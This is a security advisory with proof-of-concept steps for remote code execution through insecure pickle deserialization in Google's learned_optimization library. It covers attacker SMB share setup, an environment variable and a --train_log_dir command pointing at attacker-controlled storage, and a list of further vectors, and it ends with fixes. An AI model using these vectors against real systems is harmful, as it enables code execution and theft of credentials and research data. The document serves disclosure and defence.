learned_optimization v0.0.1 RCE via Insecure Deserialization

Below are one (1) way to reproduce RCE in learned_optimization using an SMB share controlled by an attacker, without local intervention by a third party to modify files that allow code execution during the deserialization process.

For this PoC, two (2) different devices were used to simulate the interaction between an attacking machine (Raspberry Pi with IP 192.168.1.90) and a victim machine (Windows with IP 192.168.1.88).

Note: While this vulnerability is specifically verified and reported on version 0.0.1, other prior and subsequent versions may also be susceptible to this insecure deserialization vector.

Introduction

learned_optimization is an open-source research library developed by Google for training and evaluating learned optimizers using JAX. Its primary purpose is to automate the design of optimization algorithms (like SGD or Adam) by using machine learning itself to meta-learn optimization rules. This is highly important for AI research, as it can significantly speed up the training of neural networks, optimize hyperparameter searches, and run meta-learning experiments at a massive scale in cloud architectures and TPU/GPU pods.

Vulnerability description

The read_npz function is used to load baseline results and archives. It uses filesystem.file_open (which supports remote URIs) and passes the content to numpy.load with allow_pickle=True, enabling the execution of arbitrary Python objects during deserialization.

The vulnerable code in `learned_optimization/baselines/utils.py`:

learned_optimization/baselines/utils.py

def read_npz(path: str) -> Optional[Mapping[str, Any]]:
  """Read a numpyz file from the `path`."""
  with filesystem.file_open(path, "rb") as f:
    content = f.read()
  io_buffer = io.BytesIO(content)
  try:
    # INSECURE: numpy.load with allow_pickle=True on untrusted data
    return {k: v for k, v in onp.load(io_buffer, allow_pickle=True).items()}

Technical Impact Analysis

Project Purpose & Context

learned_optimization is a research library developed by Google for training learned optimizers using JAX. It is designed for meta-learning research at scale, where researchers meta-train optimizers on a wide variety of tasks. The project handles complex state serialization for distributed training and utilizes a shared filesystem abstraction to allow seamless movement of data between local and cloud storage.

Platform & Deployment Environment

Google Cloud TPU/GPU Pods: Large-scale distributed meta-training.
Research Workstations & Colab: For rapid prototyping and analysis of meta-learning results.
MLOps & Research Pipelines: Integrated into workflows that exchange model checkpoints and baseline archives across Google Cloud Storage (GCS) buckets.

Comprehensive Risk Assessment

The vulnerability is rated as Critical. The ability to trigger RCE through network URIs (UNC/GCS) completely bypasses the local trust boundary. Because these tools are used to orchestrate expensive compute resources, a compromise can lead to massive resource theft, exfiltration of high-value research IP, and lateral movement within secure research VPCs that host sensitive research datasets.

Attack Scenario

Who wants to exploit a particular vulnerability?

Adversaries targeting AI/ML research divisions, industrial competitors looking for optimized optimizer architectures, or malicious actors seeking to hijack high-performance compute nodes (TPU/GPU pods) for cryptomining or as nodes in a botnet.

For what gain?

The objectives include exfiltration of proprietary research (model architectures and weights), harvesting of cloud credentials (GCP/IAM) from environment variables, and achieving long-term persistence within high-compute research infrastructure.

In what way?

Attackers can leverage several remote vectors:

Poisoning Baseline Archives: Providing a malicious URI pointing to an attacker-controlled SMB share or GCS bucket as the LOPT_BASELINE_ARCHIVES_DIR.
Reproduction Metadata Injections: Suggesting a malicious --train_log_dir in reproducibility guides for new research papers, forcing the victim's PopulationController to fetch a malicious state.
Distributed RPC Manipulation: Targeting the unauthenticated Courier RPC interfaces to inject malicious task configurations or weights into a running training job.

Reproduction steps

On the Raspberry (attacker)

kw0@kw0l4b:~ $ hostname -I | awk '{print $1}'
192.168.1.90
kw0@kw0l4b:~ $

Shared Resource Configuration (SMB):

1. Install Samba: sudo apt update && sudo apt install samba samba-common-bin -y
2. Prepare the attack directory:

mkdir ~/lab_attack
chmod 755 /home/kw0  # Allows Samba to access the HOME
chmod -R 777 ~/lab_attack

3. Configure Samba: Add to the end of /etc/samba/smb.conf:

[lab_share]
path = /home/kw0/lab_attack
read only = no
guest ok = yes

4. Payload Generation on the Raspberry:
Run the specialized exploit.py script to generate the adam_baseline.npz file directly in the shared path:

python exploit.py

On Windows (victim)

PS L:\Pickle-RCE-Finder\learned_optimization> Get-NetIPAddress -AddressFamily IPv4 | Where-Object PrefixOrigin -eq "Dhcp" | Select-Object -ExpandProperty IPAddress
192.168.1.88
PS L:\Pickle-RCE-Finder\learned_optimization>

Technical Requirements:

Create and activate a Python environment: python -m venv .venv
Activate the .venv: .venv\Scripts\activate
Install the requirements_rce.txt:
By default, learned_optimization project uses an old requirements.txt file that produces errors. To avoid that, we use a custom requirements_rce.txt that fixes package dependency issues.

pip install -r requirements_rce.txt

Exploit Execution:

1. Set the environment pointing to the SMB share:

$env:LOPT_BASELINE_ARCHIVES_DIR = "\\192.168.1.90\lab_share\"

2. Launch deserialization:

python -c "from learned_optimization.baselines import utils; utils.load_archive('mnist', 'adam_baseline')"

Other RCE vectors in `learned_optimization` remotely controlled by an attacker

1. Vector #1: Cloud Storage Abstraction (The Proxy Bridge)

The root of the "Reversed Context" lies in the filesystem.py module, which acts as a global wrapper for all file operations.

File: learned_optimization/filesystem.py
Mechanism: The _path_on_gcp function detects gs:// prefixes, and file_open switches from native open() to tensorflow.io.gfile.GFile.

def _path_on_gcp(path: str) -> bool:
  prefixes = ["gs://"]
  return any([path.startswith(p) for p in prefixes])

def file_open(path: str, mode: str):
  if _path_on_gcp(path):
    return tf.io.gfile.GFile(path, mode)
  return open(path, mode)

WARNING

This abstraction means that any logic expecting a "file path" is actually an SSRF-to-Deserialization surface. An attacker does not need to modify local files; they only need to provide a remote URI that the application will treat as a local stream.

2. Vector #2: Population Based Training (Critical Sink)

The most high-impact RCE vector identified exists in the PopulationController state management.

File: learned_optimization/population/population.py
Method: load_state()
Sink: pickle.loads(content)
Path Control: The path is constructed using self._log_dir.

The PopulationController is initialized with a log_dir provided by the setup_experiment module. In distributed training, this log_dir (passed via --train_log_dir CLI flag) can be set to any URI. When load_state is called, it performs a remote fetch of population.state from the bucket and immediately executes the payload during deserialization.

3. Vector #3: Baseline Results & NumPy Archives

The project includes utilities for loading precomputed results and archives, which are common entry points for researchers.

File: learned_optimization/baselines/utils.py
Function: read_npz(path)
Sink: numpy.load(io_buffer, allow_pickle=True)
Control Vector: LOPT_BASELINE_ARCHIVES_DIR (Environment Variable)

By setting the environment variable LOPT_BASELINE_ARCHIVES_DIR to a public-writable bucket (e.g., gs://public-research-archive/), an attacker can supply malicious .npz files (which are Zip files containing pickled NumPy arrays). When a user tries to "load a baseline" to compare results, the RCE is triggered remotely.

4. Vector #4: Distributed Training RPC (Courier Surface)

The project relies on Google's courier for RPC between the Learner and Workers.

File: learned_optimization/distributed.py
Protocol: Courier RPC
Exposure: AsyncLearner and SyncLearner bind service methods to open ports.

Courier, by default, often lacks robust authentication in research environments. The put_grads and get_weights methods exchange complex Python objects. If the transport layer uses Pickle (common in JAX/Flax research for speed), an attacker who can reach the Learner's port can submit a malicious "gradient" object that executes code upon the Learner's attempt to access or aggregate it.

Exploit Scenario: The "Public Log Dir" Trap

An attacker publishes a "reproducibility" guide for a new optimization technique, suggesting users run the trainer pointing to their "results" bucket for initialization:

python run_outer_trainer.py --train_log_dir=gs://attacker-research-data/experiment_v1/

The application initializes setup_experiment.
PopulationController is created with log_dir=gs://attacker-research-data/experiment_v1/.
load_state() fetches gs://attacker-research-data/experiment_v1/population.state.
Result: Immediate RCE in the context of the user running the training script, with access to their GCP credentials/environment.

Executive Summary: RCE via Insecure Pickle Deserialization in `learned_optimization`

The research documents multiple critical Remote Code Execution (RCE) vulnerabilities in Google’s learned_optimization library, caused by the insecure use of pickle and numpy.load(..., allow_pickle=True) across filesystem and RPC boundaries.

Root Cause: The library provides a filesystem.file_open abstraction that transparently supports remote URIs (gs://, SMB/UNC). It passes data retrieved from these untrusted locations directly to sinks like pickle.loads or numpy.load(allow_pickle=True).
Exploitation Mechanism: Attackers can control the source path of baseline archives or log directories via environment variables (LOPT_BASELINE_ARCHIVES_DIR) or CLI flags (--train_log_dir). By pointing these to attacker-controlled remote storage (GCS/SMB), the application automatically fetches and deserializes malicious payloads, triggering RCE in the victim's environment.

Analysis of Scope and Security Implications

This vulnerability is of critical severity, as it targets the foundational state-management and distributed-training mechanisms of the library.

1. Infection Scenarios

Baseline Archive Poisoning: Adversaries can provide malicious URIs for LOPT_BASELINE_ARCHIVES_DIR, leading to RCE when researchers attempt to load pre-computed baseline archives for comparison.
Reproducibility Metadata Injection: Researchers following guides that suggest using an attacker-supplied --train_log_dir will have their PopulationController state overwritten with a malicious pickle payload, resulting in total system compromise.
Distributed RPC Manipulation: The Courier RPC interface lacks robust authentication; attackers reaching the Learner's port can submit malicious objects that execute code during gradient aggregation.

2. Factors Exacerbating Risk

Global Filesystem Wrapper: The filesystem.py module creates an "SSRF-to-Deserialization" surface, where any part of the application expecting a local file path can be coerced into fetching and executing code from an external network source.
Targeting High-Value Infrastructure: Because the library is designed for large-scale GPU/TPU training, successful exploitation grants the attacker persistent access to high-performance compute resources, valuable intellectual property, and cloud environment credentials.

Conclusion and Recommendation

This is a critical-severity vulnerability. The systemic reliance on insecure deserialization sinks, combined with the library's ability to seamlessly traverse network boundaries, creates a massive attack surface for MLOps and research pipelines.

Suggested actions for the development team:

Remove Pickle: Replace all instances of pickle.load and allow_pickle=True with safe, non-executable data formats (e.g., Protobuf or JSON).
Restrict URI Schemes: Harden the filesystem abstraction to explicitly disable remote protocol support (e.g., GCS/SMB) for sensitive loading operations unless cryptographically verified.
Authenticate RPCs: Implement mandatory authentication for all Courier RPC service methods to prevent unauthorized injection of serialized objects during distributed training.